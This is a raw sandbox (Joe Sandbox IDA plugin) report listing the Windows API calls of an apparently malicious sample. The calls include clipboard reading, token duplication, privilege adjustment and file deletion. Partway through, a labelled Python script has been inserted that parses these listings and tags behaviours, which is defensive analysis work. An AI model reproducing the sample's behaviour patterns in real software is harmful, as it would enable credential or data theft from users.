                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Library$Free$Load__wfsopen_memmove
                                                • String ID:
                                                • API String ID: 1396898556-0
                                                • Opcode ID: d3d9e8ea25a9abca74fc72ae45e2e29e3467ee63fd3101e7cd2d6d4b7b35e8ca
                                                • Instruction ID: c431e3816fc8a7a5a32a5a4c3c2e2daca860278b78aa1b2b78adc92c5b190b6c
                                                • Opcode Fuzzy Hash: d3d9e8ea25a9abca74fc72ae45e2e29e3467ee63fd3101e7cd2d6d4b7b35e8ca
                                                • Instruction Fuzzy Hash: B611E7316D0216EBCF18FB70CC0AFAE77A99F40701F10C42DF541BA191EABC9A11AB95
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ClearVariant
                                                • String ID:
                                                • API String ID: 1473721057-0
                                                • Opcode ID: 90bc0eaf2b7dc02e78cb212d4ba3e610607b108b277c42cef43cf240b39c3ac7
                                                • Instruction ID: 83c8a5842454d9079c158bebc92286eec80f3a7684c886b9640ae6d8ede891dc
                                                • Opcode Fuzzy Hash: 90bc0eaf2b7dc02e78cb212d4ba3e610607b108b277c42cef43cf240b39c3ac7
                                                • Instruction Fuzzy Hash: 742134B4608741DFCB54DF54C458B1ABBE1BF89344F09896CF88A57322C739E849CBA2
                                                APIs
                                                • ReadFile.KERNEL32(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,00783CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00784276
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 661a3fb31612697bb77ffeb82715fa2e42328f67098717b3d6cfc6d492a260dc
                                                • Instruction ID: 306f246780f997522fcdaf2593ea93d06fb2b4be0f0c3443b3f9c21334cbcbb6
                                                • Opcode Fuzzy Hash: 661a3fb31612697bb77ffeb82715fa2e42328f67098717b3d6cfc6d492a260dc
                                                • Instruction Fuzzy Hash: 87113A312487029FD320DF55C880B66B7F5FF88710F10C92EE8AA86A50D7B9E845CB60
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: 542a4bfffb2803eb9ccca5bcc7afd3f8b165b2bf1a6417e1191cdaa5bbed4f6a
                                                • Instruction ID: 31bfcb90f6b3017888e0089d8a595c2d98a76f2968dc47844990ca729cd30618
                                                • Opcode Fuzzy Hash: 542a4bfffb2803eb9ccca5bcc7afd3f8b165b2bf1a6417e1191cdaa5bbed4f6a
                                                • Instruction Fuzzy Hash: E701F972251701AED7246F38EC06F77BB9CDB447A0F50C52EF52ACA1D1EA35E5508790
                                                APIs
                                                • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 007E4998
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: EnvironmentVariable
                                                • String ID:
                                                • API String ID: 1431749950-0
                                                • Opcode ID: a929ab573fe376e799b73072e80be86ca70bbf77b50d7db6a7ce73a235c4f0c6
                                                • Instruction ID: b9110513951f5863396915a9f3e6ded76a298cb5b9d457646406601f7c499a35
                                                • Opcode Fuzzy Hash: a929ab573fe376e799b73072e80be86ca70bbf77b50d7db6a7ce73a235c4f0c6
                                                • Instruction Fuzzy Hash: C4F04435608109EFCB14FB65D84AC9F77BCEF49720B404056F9089B251DE75BD41C750
                                                APIs
                                                  • Part of subcall function 00790FE6: std::exception::exception.LIBCMT ref: 0079101C
                                                  • Part of subcall function 00790FE6: __CxxThrowException@8.LIBCMT ref: 00791031
                                                • _memset.LIBCMT ref: 007D7CB4
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Exception@8Throw_memsetstd::exception::exception
                                                • String ID:
                                                • API String ID: 525207782-0
                                                • Opcode ID: dfea13ef8d664f2402f1372fa9a45a609c6fe10dff130b19145f17d106351125
                                                • Instruction ID: 88e666308c8ea965db234ff05886d95c65e54c82f64907b92f26b505edf13820
                                                • Opcode Fuzzy Hash: dfea13ef8d664f2402f1372fa9a45a609c6fe10dff130b19145f17d106351125
                                                • Instruction Fuzzy Hash: 2201F674208200DFD725EF5CE545F45BBE6AF59710F24C45AF5888B392DB76E800CB91
                                                APIs
                                                Similarity
                                                • API ID: _fseek
                                                • String ID:
                                                • API String ID: 2937370855-0
                                                APIs
                                                • FreeLibrary.KERNEL32(?,?,?,007827AF,?,00000001), ref: 00784A63
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                APIs
                                                Similarity
                                                • API ID: __fread_nolock
                                                • String ID:
                                                • API String ID: 2638373210-0
                                                APIs
                                                • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 007909E4
                                                  • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                Similarity
                                                • API ID: LongNamePath_memmove
                                                • String ID:
                                                • API String ID: 2514874351-0
                                                APIs
                                                • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 007D4D31
                                                  • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                Similarity
                                                • API ID: FolderPath_memmove
                                                • String ID:
                                                • API String ID: 3334745507-0
                                                APIs
                                                  • Part of subcall function 007D384C: SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000001,00000000,00000000,007D3959,00000000,00000000,?,007C05DB,00828070,00000002,?,?), ref: 007D38CA
                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,?,007C05DB,00828070,00000002,?,?,?,00000000), ref: 007D3967
                                                Similarity
                                                • API ID: File$PointerWrite
                                                • String ID:
                                                • API String ID: 539440098-0
                                                APIs
                                                • CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,007D3E7D,?,?,?), ref: 007D3F0D
                                                Similarity
                                                • API ID: CopyFile
                                                • String ID:
                                                • API String ID: 1304948518-0
                                                APIs
                                                • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,007C06E6,00000000,00000000,00000000), ref: 007842BF
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                APIs
                                                • GetFileAttributesW.KERNEL32(?,007D3BFE), ref: 007D4FED
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                APIs
                                                Similarity
                                                • API ID: __wfsopen
                                                • String ID:
                                                • API String ID: 197181222-0
                                                APIs
                                                • GetLastError.KERNEL32(00000002,00000000), ref: 007DD842
                                                Similarity
                                                • API ID: ErrorLast
                                                • String ID:
                                                • API String ID: 1452528299-0
                                                APIs
                                                  • Part of subcall function 007D4005: FindFirstFileW.KERNEL32(?,?), ref: 007D407C
                                                  • Part of subcall function 007D4005: DeleteFileW.KERNEL32(?,?,?,?), ref: 007D40CC
                                                  • Part of subcall function 007D4005: FindNextFileW.KERNELBASE(00000000,00000010), ref: 007D40DD
                                                  • Part of subcall function 007D4005: FindClose.KERNEL32(00000000), ref: 007D40F4
                                                • GetLastError.KERNEL32 ref: 007DC292
                                                Similarity
                                                • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                • String ID:
                                                • API String ID: 2191629493-0
                                                APIs
                                                • CloseHandle.KERNEL32(?,?,00000000,007B2F8B), ref: 007842EF
                                                Similarity
                                                • API ID: CloseHandle
                                                • String ID:
                                                • API String ID: 2962429428-0
                                                APIs
                                                  • Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3
                                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 007FD208
                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007FD249
                                                • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 007FD28E
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007FD2B8
                                                • SendMessageW.USER32 ref: 007FD2E1
                                                • _wcsncpy.LIBCMT ref: 007FD359
                                                • GetKeyState.USER32(00000011), ref: 007FD37A
                                                • GetKeyState.USER32(00000009), ref: 007FD387
                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007FD39D
                                                • GetKeyState.USER32(00000010), ref: 007FD3A7
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007FD3D0
                                                • SendMessageW.USER32 ref: 007FD3F7
                                                • SendMessageW.USER32(?,00001030,?,007FB9BA), ref: 007FD4FD
                                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 007FD513
                                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 007FD526
                                                • SetCapture.USER32(?), ref: 007FD52F
                                                • ClientToScreen.USER32(?,?), ref: 007FD594
                                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 007FD5A1
                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007FD5BB
                                                • ReleaseCapture.USER32 ref: 007FD5C6
                                                • GetCursorPos.USER32(?), ref: 007FD600
                                                • ScreenToClient.USER32(?,?), ref: 007FD60D
                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 007FD669
                                                • SendMessageW.USER32 ref: 007FD697
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 007FD6D4
                                                • SendMessageW.USER32 ref: 007FD703
                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 007FD724
                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 007FD733
                                                • GetCursorPos.USER32(?), ref: 007FD753
                                                • ScreenToClient.USER32(?,?), ref: 007FD760
                                                • GetParent.USER32(?), ref: 007FD780
                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 007FD7E9
                                                • SendMessageW.USER32 ref: 007FD81A
                                                • ClientToScreen.USER32(?,?), ref: 007FD878
                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 007FD8A8
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 007FD8D2
                                                • SendMessageW.USER32 ref: 007FD8F5
                                                • ClientToScreen.USER32(?,?), ref: 007FD947
                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 007FD97B
                                                  • Part of subcall function 007729AB: GetWindowLongW.USER32(?,000000EB), ref: 007729BC
                                                • GetWindowLongW.USER32(?,000000F0), ref: 007FDA17
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                • String ID: @GUI_DRAGID$F
                                                • API String ID: 3977979337-4164748364
                                                • Opcode ID: c07d03a95a73f845d7c4e17774ab57859c30931764d611f50e4df0368d151015
                                                • Instruction ID: d34f0fbacebad5101ca227e3a42fe8b5d47c2be7c4ca67389a61e1190d6f0e56
                                                • Opcode Fuzzy Hash: c07d03a95a73f845d7c4e17774ab57859c30931764d611f50e4df0368d151015
                                                • Instruction Fuzzy Hash: E2427B702042499FD724DF28C848BAABBE6FF89310F140619F7A5873A1D775EC54DB91
                                                APIs
                                                  • Part of subcall function 007C9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007C93E3
                                                  • Part of subcall function 007C9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007C9410
                                                  • Part of subcall function 007C9399: GetLastError.KERNEL32 ref: 007C941D
                                                • _memset.LIBCMT ref: 007C8F71
                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 007C8FC3
                                                • CloseHandle.KERNEL32(?), ref: 007C8FD4
                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007C8FEB
                                                • GetProcessWindowStation.USER32 ref: 007C9004
                                                • SetProcessWindowStation.USER32(00000000), ref: 007C900E
                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 007C9028
                                                  • Part of subcall function 007C8DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007C8F27), ref: 007C8DFE
                                                  • Part of subcall function 007C8DE9: CloseHandle.KERNEL32(?,?,007C8F27), ref: 007C8E10
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                • String ID: $default$winsta0
                                                • API String ID: 2063423040-1027155976
                                                • Opcode ID: 484ee493b7dd3c900340f10693357189a7e3568a49101f2e345a6283fb8203c6
                                                • Instruction ID: 452fbd277c5de89b0264ee76da6235071f376f70c3d4d13ad6be50efb56a8756
                                                • Opcode Fuzzy Hash: 484ee493b7dd3c900340f10693357189a7e3568a49101f2e345a6283fb8203c6
                                                • Instruction Fuzzy Hash: D08148B190420DBFDF519FA4DC4AFEE7B79BF04304F08411DFA10A6261DB3A8A159B61
                                                APIs
                                                • OpenClipboard.USER32(00800980), ref: 007E465C
                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 007E466A
                                                • GetClipboardData.USER32(0000000D), ref: 007E4672
                                                • CloseClipboard.USER32 ref: 007E467E
                                                • GlobalLock.KERNEL32(00000000), ref: 007E469A
                                                • CloseClipboard.USER32 ref: 007E46A4
                                                • GlobalUnlock.KERNEL32(00000000), ref: 007E46B9
                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 007E46C6
                                                • GetClipboardData.USER32(00000001), ref: 007E46CE
                                                • GlobalLock.KERNEL32(00000000), ref: 007E46DB
                                                • GlobalUnlock.KERNEL32(00000000), ref: 007E470F
                                                • CloseClipboard.USER32 ref: 007E481F
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                • String ID:
                                                • API String ID: 3222323430-0
                                                • Opcode ID: 35304d4d88814f985f664b358bc2f366e216654f90ffd6a2f18dfc4e8741ba1d
                                                • Instruction ID: db46a3a4eea26a13d05df09005d46a0f859d3174f9f11b455da9284ed5d986fb
                                                • Opcode Fuzzy Hash: 35304d4d88814f985f664b358bc2f366e216654f90ffd6a2f18dfc4e8741ba1d
                                                • Instruction Fuzzy Hash: AF51DC31245381ABD300EF61DC89F6E73A8BF98B40F000529F65AD22E1DF78D8058F66
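The two listings above (the token-duplication / window-station function at 007C8F71 and the clipboard reader at 007E465C) are raw API traces, and the window-station DACL function further down is another. The following Python is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses API lines in exactly the report's format (direct calls, "Part of subcall function" lines, calls with and without argument lists) and tags each function with the behaviour its API set implies. The embedded SAMPLE is copied from the listings above (the token function trimmed to its first ten calls); the BEHAVIOURS rule set and its tag names are the example's own assumptions, and the only constants it decodes are the documented Win32 clipboard formats CF_TEXT (1) and CF_UNICODETEXT (13).

```python
"""Parse Joe Sandbox per-function "APIs" listings and tag behaviours.
Added example; not code from the report or from the sample."""
import re

# One API line. Examples of the shapes handled:
#   • DuplicateTokenEx.ADVAPI32(?,00000000,00000002,00000001), ref: 007C8FC3
#   • GetProcessWindowStation.USER32 ref: 007C9004
#   • Part of subcall function 007C9399: GetLastError.KERNEL32 ref: 007C941D
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

# Assumed rule set: a function gets the tag when every listed API appears in
# it, directly or through a "Part of subcall" line. Names are the report's.
BEHAVIOURS = {
    "clipboard read": {"OpenClipboard", "GetClipboardData", "GlobalLock"},
    "token privilege adjustment": {"LookupPrivilegeValueW", "AdjustTokenPrivileges"},
    "token duplication + winsta/desktop open": {"DuplicateTokenEx", "OpenWindowStationW", "OpenDesktopW"},
    "winsta/desktop DACL rewrite": {"GetUserObjectSecurity", "AddAce", "SetUserObjectSecurity"},
}

# Win32 clipboard format constants (CF_TEXT = 1, CF_UNICODETEXT = 13).
CLIPBOARD_FORMATS = {1: "CF_TEXT", 13: "CF_UNICODETEXT"}


def parse_call(line):
    """Return a dict for one API line, or None for any other report line."""
    m = CALL_RE.match(line)
    if not m:
        return None
    args = m.group("args")
    return {
        "api": m.group("api"),
        "module": m.group("mod"),
        "args": [] if args is None else args.split(","),
        "ref": int(m.group("ref"), 16),
        "subcall": m.group("sub"),  # callee address for indirect calls, else None
    }


def parse_functions(text):
    """Each 'APIs' heading starts a new function; other headings are ignored."""
    functions, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            functions.append(current)
            continue
        call = parse_call(line)
        if call is not None and current is not None:
            current.append(call)
    return functions


def tag_function(calls):
    names = {c["api"] for c in calls}
    tags = [tag for tag, needed in BEHAVIOURS.items() if needed <= names]
    for c in calls:  # decode the clipboard format argument where it is known
        if c["api"] == "GetClipboardData" and c["args"] and c["args"][0] != "?":
            fmt = CLIPBOARD_FORMATS.get(int(c["args"][0], 16))
            if fmt:
                tags.append("clipboard format " + fmt)
    return tags


def summarize(text):
    out = []
    for calls in parse_functions(text):
        direct = [c["ref"] for c in calls if c["subcall"] is None]
        if not direct:
            continue
        out.append({"ref_range": (hex(min(direct)), hex(max(direct))),
                    "n_calls": len(calls), "tags": tag_function(calls)})
    return out


# Constructed input: lines copied from the report listings above.
SAMPLE = """APIs
  • Part of subcall function 007C9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007C93E3
  • Part of subcall function 007C9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007C9410
  • Part of subcall function 007C9399: GetLastError.KERNEL32 ref: 007C941D
• _memset.LIBCMT ref: 007C8F71
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 007C8FC3
• CloseHandle.KERNEL32(?), ref: 007C8FD4
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007C8FEB
• GetProcessWindowStation.USER32 ref: 007C9004
• SetProcessWindowStation.USER32(00000000), ref: 007C900E
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 007C9028
Strings
Memory Dump Source
APIs
• OpenClipboard.USER32(00800980), ref: 007E465C
• IsClipboardFormatAvailable.USER32(0000000D), ref: 007E466A
• GetClipboardData.USER32(0000000D), ref: 007E4672
• CloseClipboard.USER32 ref: 007E467E
• GlobalLock.KERNEL32(00000000), ref: 007E469A
• CloseClipboard.USER32 ref: 007E46A4
• GlobalUnlock.KERNEL32(00000000), ref: 007E46B9
• IsClipboardFormatAvailable.USER32(00000001), ref: 007E46C6
• GetClipboardData.USER32(00000001), ref: 007E46CE
• GlobalLock.KERNEL32(00000000), ref: 007E46DB
• GlobalUnlock.KERNEL32(00000000), ref: 007E470F
• CloseClipboard.USER32 ref: 007E481F
"""

if __name__ == "__main__":
    for entry in summarize(SAMPLE):
        print(entry)
```

The rules are deliberately set-based rather than order-based: the report lists calls in address order, not execution order, and subcall lines are interleaved where the call site sits, so requiring a strict sequence would miss the privilege adjustment that happens inside 007C9399. Feed the whole "APIs" section of a report through `summarize` to get one tagged row per function.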
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 007DF5F9
                                                • _wcscmp.LIBCMT ref: 007DF60E
                                                • _wcscmp.LIBCMT ref: 007DF625
                                                • GetFileAttributesW.KERNEL32(?), ref: 007DF637
                                                • SetFileAttributesW.KERNEL32(?,?), ref: 007DF651
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 007DF669
                                                • FindClose.KERNEL32(00000000), ref: 007DF674
                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 007DF690
                                                • _wcscmp.LIBCMT ref: 007DF6B7
                                                • _wcscmp.LIBCMT ref: 007DF6CE
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 007DF6E0
                                                • SetCurrentDirectoryW.KERNEL32(0082B578), ref: 007DF6FE
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 007DF708
                                                • FindClose.KERNEL32(00000000), ref: 007DF715
                                                • FindClose.KERNEL32(00000000), ref: 007DF727
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                • String ID: *.*$S}
                                                • API String ID: 1803514871-2863189289
                                                • Opcode ID: 587fe9491fbb95030189621e9cf3dffb1edbfd88b5c684ad6f0c7bce3a06f415
                                                • Instruction ID: 8165a75c1f5ed666bc5abf5a910d83f9dab933f21b9d68b8b93cd01af3c5fd05
                                                • Opcode Fuzzy Hash: 587fe9491fbb95030189621e9cf3dffb1edbfd88b5c684ad6f0c7bce3a06f415
                                                • Instruction Fuzzy Hash: 00319571641219BADF509FB4EC4DAEE77BCEF09321F540166F816E22A0DB38DA44DE60
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?), ref: 007DCDD0
                                                • FindClose.KERNEL32(00000000), ref: 007DCE24
                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007DCE49
                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007DCE60
                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 007DCE87
                                                • __swprintf.LIBCMT ref: 007DCED3
                                                • __swprintf.LIBCMT ref: 007DCF16
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                • __swprintf.LIBCMT ref: 007DCF6A
                                                  • Part of subcall function 007938C8: __woutput_l.LIBCMT ref: 00793921
                                                • __swprintf.LIBCMT ref: 007DCFB8
                                                  • Part of subcall function 007938C8: __flsbuf.LIBCMT ref: 00793943
                                                  • Part of subcall function 007938C8: __flsbuf.LIBCMT ref: 0079395B
                                                • __swprintf.LIBCMT ref: 007DD007
                                                • __swprintf.LIBCMT ref: 007DD056
                                                • __swprintf.LIBCMT ref: 007DD0A5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
